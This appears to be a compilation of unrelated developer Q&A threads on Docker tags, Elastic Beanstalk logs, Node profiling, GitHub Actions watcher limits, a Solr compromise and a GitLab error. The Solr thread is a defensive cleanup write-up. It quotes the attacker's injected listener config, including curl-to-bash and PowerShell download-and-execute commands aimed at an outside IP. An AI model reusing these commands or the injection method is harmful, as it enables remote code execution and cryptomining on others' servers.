I was running the very good LinuxServer.io Unifi Controller Docker image on my Raspberry Pi 3.
Unfortunately, as of 2022-06-01 this image no longer supports ARM32.
I didn't realise this when I ran docker-compose pull to update to the latest image, and now my controller won't start, giving the error message:
unifi-controller | ********************************************************
unifi-controller | ********************************************************
unifi-controller | * *
unifi-controller | * !!!! *
unifi-controller | * This Unifi-Controller image does not support *
unifi-controller | * 32 bit ARM due to a lack of OS packages *
unifi-controller | * *
unifi-controller | * *
unifi-controller | ********************************************************
unifi-controller | ********************************************************
Is there any way to pin docker-compose back to the pre-deprecation version?
When I run docker image ls, I still have the following images available on my system:
REPOSITORY                             TAG       IMAGE ID       CREATED         SIZE
lscr.io/linuxserver/unifi-controller   latest    deeabba24529   10 days ago     102MB
lscr.io/linuxserver/unifi-controller   <none>    048ec856c236   9 months ago    524MB
lscr.io/linuxserver/unifi-controller   <none>    4858fc11dcf2   10 months ago   520MB
Or I could adjust the version in docker-compose.yml to select an old version perhaps.
I understand the risks of running old software, but the newer 64-bit Raspberry Pi 4s are out of stock in my country, so my ability to upgrade the hardware immediately is limited, and I need access to my network configuration.
Just set the image: configuration for the relevant containers in your docker-compose.yaml to a specific version. Instead of:
image: lscr.io/linuxserver/unifi-controller:latest
use something like:
image: lscr.io/linuxserver/unifi-controller:arm32v7-7.3.76
Or whichever version is appropriate. Using the latest tag is often considered an anti-pattern for exactly this reason: upgrades to a new major version can break your application stack. In most cases it's better to pin your docker-compose.yml to a specific version.
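For example, a pinned service definition in docker-compose.yml might look something like this (the layout and tag here are only illustrative; use whatever tag actually exists for your image):

services:
  unifi-controller:
    image: lscr.io/linuxserver/unifi-controller:arm32v7-7.3.76
    container_name: unifi-controller
    restart: unless-stopped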
Most image repositories have a browsable interface for discovering available tags. I'm not familiar with the lscr.io repository, but if there isn't a convenient web interface you can use skopeo:
skopeo list-tags docker://lscr.io/linuxserver/unifi-controller
I'm wondering how to do log task customization in the new Elastic Beanstalk platform (the one based on Amazon Linux 2). Specifically, I'm comparing:
Old: Single-container Docker running on 64bit Amazon Linux/2.14.3
New: Single-container Docker running on 64bit Amazon Linux 2/3.0.0
(My question actually has nothing to do with Docker as such; I suspect the problem exists for any of the new Elastic Beanstalk platforms.)
Previously I could follow Amazon's recipe: put a file into /opt/elasticbeanstalk/tasks/bundlelogs.d/ and it would then be acted upon. This is no longer the case.
Has this changed? I can't find it documented. Anyone been successful in doing log task customization on the newer Elastic Beanstalk platform? If so, how?
Minimal working example
I've created a minimal working example and deployed it on both platforms.
Dockerfile:
FROM ubuntu
COPY daemon-run.sh /daemon-run.sh
RUN chmod +x /daemon-run.sh
EXPOSE 80
ENTRYPOINT ["/daemon-run.sh"]
Dockerrun.aws.json:
{
  "AWSEBDockerrunVersion": "1",
  "Logging": "/var/mydaemon"
}
daemon-run.sh:
#!/bin/bash
echo "Starting daemon" # output to stdout
mkdir -p /var/mydaemon/deeperlogs
while true; do
  echo "$(date '+%Y-%m-%dT%H:%M:%S%:z') Hello World" >> /var/mydaemon/deeperlogs/app_$$.log
  sleep 5
done
.ebextensions/mydaemon-logfiles.config:
files:
  "/opt/elasticbeanstalk/tasks/bundlelogs.d/mydaemon-logs.conf":
    mode: "000755"
    owner: root
    group: root
    content: |
      /var/log/eb-docker/containers/eb-current-app/deeperlogs/*.log
If I do the "Full Logs" action on the old platform, I get a ZIP with my deeperlogs included inside var/log/eb-docker/containers/eb-current-app. On the new platform I don't.
Investigation
If you look on the disk you'll see that the new Elastic Beanstalk doesn't have a /opt/elasticbeanstalk/tasks folder at all, unlike the old one. Hmm.
On Amazon Linux 2 the folder is:
/opt/elasticbeanstalk/config/private/logtasks/bundle
The .ebextensions/mydaemon-logfiles.config should be:
files:
  "/opt/elasticbeanstalk/config/private/logtasks/bundle/mydaemon-logs.conf":
    mode: "000644"
    owner: root
    group: root
    content: |
      /var/mydaemon/deeperlogs/*.log

container_commands:
  append_deeperlogs_to_applogs:
    command: echo -e "\n/var/log/eb-docker/containers/eb-current-app/deeperlogs/*" >> /opt/elasticbeanstalk/config/private/logtasks/bundle/applogs
The mydaemon-logfiles.config also adds deeperlogs to the applogs file. Without this, deeperlogs will not be included in the downloaded log zip bundle. This is interesting, because the folder is in the correct location, i.e. /var/log/eb-docker/containers/eb-current-app/deeperlogs/, yet without being explicitly listed in applogs it is skipped when the zip bundle is generated.
I tested this with a single-container Docker environment (3.0.1).
The full log bundle successfully contained deeperlogs with the correct log data.
Hope this helps. I haven't found any references for this; the AWS documentation does not cover it, as it is mostly based on Amazon Linux 1, not Amazon Linux 2.
Amazon has fixed this problem in the versions of the Elastic Beanstalk AL2 platforms released on 04-AUG-2020.
Log task customization on AL2-based platforms now works the way it has always worked (i.e. as on the previous generation AL2018 platforms), so you can follow the official documentation to make this happen.
Successfully tested with platform "Docker running on 64bit Amazon Linux 2/3.1.0". If you (still) use "Docker running on 64bit Amazon Linux 2/3.0.x" then you must use the undocumented workaround described in Marcin's answer, but you are probably better off upgrading your platform version.
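For reference, on the fixed platform versions the .ebextensions snippet takes the same shape as the original one in the question; a sketch (using the question's paths, adjust to your own log locations) would be:

files:
  "/opt/elasticbeanstalk/tasks/bundlelogs.d/mydaemon-logs.conf":
    mode: "000755"
    owner: root
    group: root
    content: |
      /var/mydaemon/deeperlogs/*.log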
As of 2021/11/05, I had tried the accepted answer and various other examples, including the latest official documentation on using the .ebextensions folder with *.config files, without success.
Most likely something I was doing wrong but here's what worked for me.
The version I'm using: Docker running on 64bit Amazon Linux 2/3.4.8
Simply add a volume to your docker-compose.yml file to share your application logs with the Elastic Beanstalk log directory.
Example docker-compose.yml:
version: "3.9"
services:
  app:
    build: .
    ports:
      - "80:80"
    user: root
    volumes:
      - ./:/var/www/html
      # "${EB_LOG_BASE_DIR}/<service name>:<log directory inside container>
      - "${EB_LOG_BASE_DIR}/app:/var/www/html/application/logs" # ADD THIS LINE
    env_file:
      - .env
For more info, here's the documentation I followed.
Hopefully, this helps future readers like myself đź‘Ť
We have a very stateful NodeJS based web server (Meteor) that occasionally, randomly becomes slow in production. The problem is not reproducible in any of our tests, and we don't know what's triggering it.
To diagnose this, we are using the v8-profiler package. This lets us trigger a 10-second CPU profile and download it for offline analysis.
Despite not having received any commits in 3 years, the package used to work fairly well. It has given us compilation trouble in the past, and now it looks like it stopped compiling entirely, breaking our build. The build happens inside a Docker container with all versions pinned, including NodeJS and v8-profiler itself, so it's unlikely that we can fix this on our end.
I'm thinking there must be some alternative, better maintained approach. But where is it?
(Note that restarting the server with additional flags (like --profile) is not an option, because it destroys all the evidence of the problem.)
I found that there is v8-profiler-next, which is a successor to v8-profiler.
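I haven't battle-tested it myself, but its README mirrors the old v8-profiler API, so a minimal sketch of an on-demand 10-second CPU profile (the output path and the way you trigger it are just placeholders) could look like:

const fs = require('fs');
const v8Profiler = require('v8-profiler-next');

// per the README, type 1 produces the newer .cpuprofile format Chrome DevTools expects
v8Profiler.setGenerateType(1);

function captureCpuProfile(seconds, outFile) {
  const title = `cpu-${Date.now()}`;
  v8Profiler.startProfiling(title, true); // true = record samples
  setTimeout(() => {
    const profile = v8Profiler.stopProfiling(title);
    profile.export((err, result) => {
      if (!err) fs.writeFileSync(outFile, result); // load this file in DevTools
      profile.delete();
    });
  }, seconds * 1000);
}

// e.g. call this from an admin-only endpoint when the server becomes slow
captureCpuProfile(10, '/tmp/slow-server.cpuprofile');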
I hope this works for you.
I just built a tool for this, called ntop: like "top" but for Node apps. https://github.com/DVLP/ntop
The code below enables communication with the CLI. It is designed to add no overhead while the CLI tool is not in use, so it can run in production; the profiler connects/disconnects only while the CLI is actually profiling.
The app:
import * as ntop from 'ntop'
ntop()
CLI shortcut to get a list of PIDs for convenience:
npx ntop
Outputs PIDs and additionally the command used to create the process for easier recognition.
Process detected at 12345 Details: node ./src/index.js --port 8216
npx ntop 12345
Outputs a list like "Bottom Up" in Chrome Dev Tools
(garbage collector) | 16.101ms |
shift | 10.038ms | node:internal/priority_queue:98:7
(anonymous) | 9.192ms | file:///home/app/src/controllers/Server.js:24:29
utils.bulkPreparePacket | 4.924ms | file:///home/app/src/Utils.js:91:26
preparePacket | 4.776ms | file:///home/app/src/Model.js:98:54
baseGetTag | 1.727ms | file:///home/app/node_modules/lodash/lodash.js:3104:23
(anonymous) | 1.702ms | evalmachine.:3:14
isPrototype | 1.441ms | file:///home/app/node_modules/lodash/lodash.js:6441:24
(program) | 1.411ms |
percolateDown | 1.124ms | node:internal/priority_queue:40:15
I have the following error:
Error: ENOSPC: System limit for number of file watchers reached, watch '/home/ runner/work...
I tried all the ways I know of to increase the limit (ulimit -S -n unlimited, sysctl, etc.), but nothing seems to work, not even with sudo.
My website has a lot of Markdown files (~80k) used by Gatsby to build the final .html files.
On my machine I just need to increase the file-watcher limit, of course, and then it works. But in GitHub Actions I can't figure out a way to do this.
My GitHub Actions workflow.yml:
name: Build
on: [push, repository_dispatch]
jobs:
  update:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v1
      - name: Increase file limit
        run: sudo sysctl -w fs.file-max=65536
      - name: Debug
        run: ulimit -a
      - name: Set Node.js
        uses: actions/setup-node@master
        with:
          node-version: 12.x
      - name: Install dependencies
        run: npm install
      - name: Build
        run: npm run build
I think this could be related to this issue: https://github.com/gatsbyjs/gatsby/issues/17321
It sounds like these GitHub/Expo issues might be the problem:
https://github.com/expo/expo-github-action/issues/20
ENOSPC: System limit for number of file watchers reached
https://github.com/expo/expo-cli/issues/277
Handle ENOSPC error (fs.inotify.max_user_watches reached)
Thanks for testing!
I'm afraid this seems to be a GitHub Actions limitation. That Docker image is forcing the fs.inotify.max_user_watches limit to 524288, but apparently GHA is overwriting this back to 8192. You can see this happen in a fork of your repo (when we are done, I'll remove the fork ofc; let me know if you want it removed earlier).
Continuing...
Yes, it's related to a limitation of the environment you are running Expo CLI in. The Metro bundler apparently requires a high number of listeners, and this fails if the host environment limits it. So technically it's an environment issue, but I'm not sure if the CLI can change anything about this.
I personally find the limit in GitHub Actions a little low. As I tried to outline in an earlier comment on that CLI issue, other CI vendors actually set this limit to the default maximum. Why they did not do this in GH Actions is unclear; that's what I'm trying to find out. It might be a configuration issue on their end, or an intentional limitation.
... And ...
So, there exists a fix that seemed to work for me when I tried it. What I did was follow this guy's tip, "Increasing the number of watchers" by #JNYBGR: https://link.medium.com/9Zbt3B4pM0
I then did this in my main action.yml, with all the specifics underneath the dev release:
steps:
  - uses: actions/checkout@v1
  - name: Setup kernel for react native, increase watchers
    run: echo fs.inotify.max_user_watches=524288 | sudo tee -a /etc/sysctl.conf && sudo sysctl -p
  - name: Run dev release fastlane inside docker action
Please let us know if any of this matches your environment/scenario, and if you find a viable workaround.
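Applied to the Gatsby workflow in the question, the relevant steps might look something like this (untested sketch, reusing the versions from the question):

jobs:
  update:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v1
      - name: Increase inotify watcher limit
        run: echo fs.inotify.max_user_watches=524288 | sudo tee -a /etc/sysctl.conf && sudo sysctl -p
      - uses: actions/setup-node@master
        with:
          node-version: 12.x
      - name: Install dependencies
        run: npm install
      - name: Build
        run: npm run build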
UPDATE:
The OP tried fs.inotify.max_user_watches=524288 in his .yaml, and Gatsby now fails with Error: EMFILE: too many open files open '/home/runner/work/virtualizedfy.gatsby, and Node.js subsequently crashes with an assertion error:
node[3007]: ../src/spawn_sync.cc:460:v8::Maybe<bool> node::SyncProcessRunner::TryInitializeAndRunLoop(v8::Local<v8::Value>): Assertion `(uv_loop_init(uv_loop_)) == (0)' failed.
ADDITIONAL SUGGESTION:
https://github.com/gatsbyjs/gatsby/issues/12011
Google seems to suggest https://github.com/isaacs/node-graceful-fs as a drop-in replacement for fs, so I might also experiment with that to see if it makes a difference.
EDIT: I can confirm that monkeypatching fs with graceful-fs at the top of gatsby-node.js, as in the snippet below, fixes the issue for me.
const realFs = require('fs')
const gracefulFs = require('graceful-fs')
gracefulFs.gracefulify(realFs)
EDIT 2: Actually, after upgrading from Node 10 to Node 11 everything seems to be fine without having to patch fs. So all is well!
Prehistory:
My friend's site started to work slowly.
The site uses Docker.
htop showed me that all cores were loaded to 100% by the process /var/tmp/sustes running as user 8983. I tried to find out what sustes is, but Google did not help; however, user 8983 suggests the problem is in the Solr container.
I tried to update Solr from v6.? to 7.4 and got this message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
I rolled back to v6.6.4 (the only v6 available on Docker Hub, https://hub.docker.com/_/solr/), since the site had to keep working.
In Docker's logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persisted to File System [{"update-listener":{
    "exe":"sh",
    "name":"newlistener-02",
    "args":["-c",
      "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
    "event":"newSearcher",
    "class":"solr.RunExecutableListener",
    "dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code, which installs a crypto miner (the miner config is at http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can see the full config, but right now we just need the listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings in solrconfig.xml, I found them in /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the contents of this file can also be viewed at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay).
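For example, you can inspect the overlay from the host with something like this (adjust the hostname and core name to yours):

curl -s http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay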
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to start/stop: https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart the Docker container.
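If Solr runs in Docker, the whole fix can look something like this (the container name solr-container matches the docker-compose snippet later in this answer; adjust the core name):

docker exec solr-container rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json
docker restart solr-container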
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and was fixed in v5.5.5, 6.6.2+ and 7.1+.
The attack was possible because http://example.com:8983 was freely accessible to anyone, so even though this particular exploit is fixed, let's...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
  "authentication":{
    "blockUnknown": true,
    "class":"solr.BasicAuthPlugin",
    "credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
  },
  "authorization":{
    "class":"solr.RuleBasedAuthorizationPlugin",
    "permissions":[{"name":"security-edit",
      "role":"admin"}],
    "user-role":{"solr":"admin"}
  }
}
This file must be dropped into /opt/solr/server/solr/ (i.e. next to solr.xml).
As Solr has its own hash checker (a sha256(password+salt) hash), a typical password hash can not be used here. The easiest way I've found to generate the hash is to download the jar file from http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
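Once Solr is restarted with security.json in place, a quick sanity check that authentication works (replace NewPassword with your own password) might be:

curl -u solr:NewPassword http://127.0.0.1:8983/solr/admin/info/system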
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
  build: ./dockerfiles/solr/
  container_name: solr-container
  # Check if 'default' core is created. If not, then create it.
  entrypoint:
    - docker-entrypoint.sh
    - solr-precreate
    - default
  # Access to web interface from host to container, i.e 127.0.0.1:8983
  ports:
    - "8983:8983"
  volumes:
    - ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
    - ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes
I'm running an instance of Gitlab Omnibus CE, version 8.15.2, on CentOS 7.3.1611. Upgrading from the 8.14 release family didn't go quite according to plan; since doing that, I've been unable to access the Gitlab browser interface.
When I try to access the browser interface, I can access the login screen and log in, but after I'm logged in, going to any page results in an Error 500: Whoops, something went wrong on our end.
So I used gitlab-ctl tail to grab some log data on what's happening, and it looks like it's a problem with PostgreSQL's data for one of my projects:
http://pastebin.com/VDMk0eKr
But I'm not sure how I should fix this. Any ideas?
It's a known issue that has been fixed in the newest release, 8.15.3. If you don't want to upgrade GitLab, there is an existing workaround (Edit: as mentioned in the comments, the workaround does not always work, so consider upgrading as the primary option).
File:
/opt/gitlab/embedded/service/gitlab-rails/app/models/concerns/has_status.rb
Replace
builds = scope.select('count(*)').to_sql
created = scope.created.select('count(*)').to_sql
success = scope.success.select('count(*)').to_sql
pending = scope.pending.select('count(*)').to_sql
running = scope.running.select('count(*)').to_sql
skipped = scope.skipped.select('count(*)').to_sql
canceled = scope.canceled.select('count(*)').to_sql
with
builds = scope.select('count(*)').reorder(nil).to_sql
created = scope.created.select('count(*)').reorder(nil).to_sql
success = scope.success.select('count(*)').reorder(nil).to_sql
pending = scope.pending.select('count(*)').reorder(nil).to_sql
running = scope.running.select('count(*)').reorder(nil).to_sql
skipped = scope.skipped.select('count(*)').reorder(nil).to_sql
canceled = scope.canceled.select('count(*)').reorder(nil).to_sql
And restart GitLab.
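On an Omnibus install, restarting usually means something like:

sudo gitlab-ctl restart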
I had the same issue and the above didn't work, so I ran the following commands to downgrade.
To check the current version installed:
sudo dpkg -l | grep gitlab-ce
To see which versions were available:
sudo apt-cache madison gitlab-ce | less
and the following to "downgrade", since I was at 9.2.0-rc2.ce.0 as shown by the above command:
sudo apt-get install gitlab-ce=9.2.0-rc1.ce.0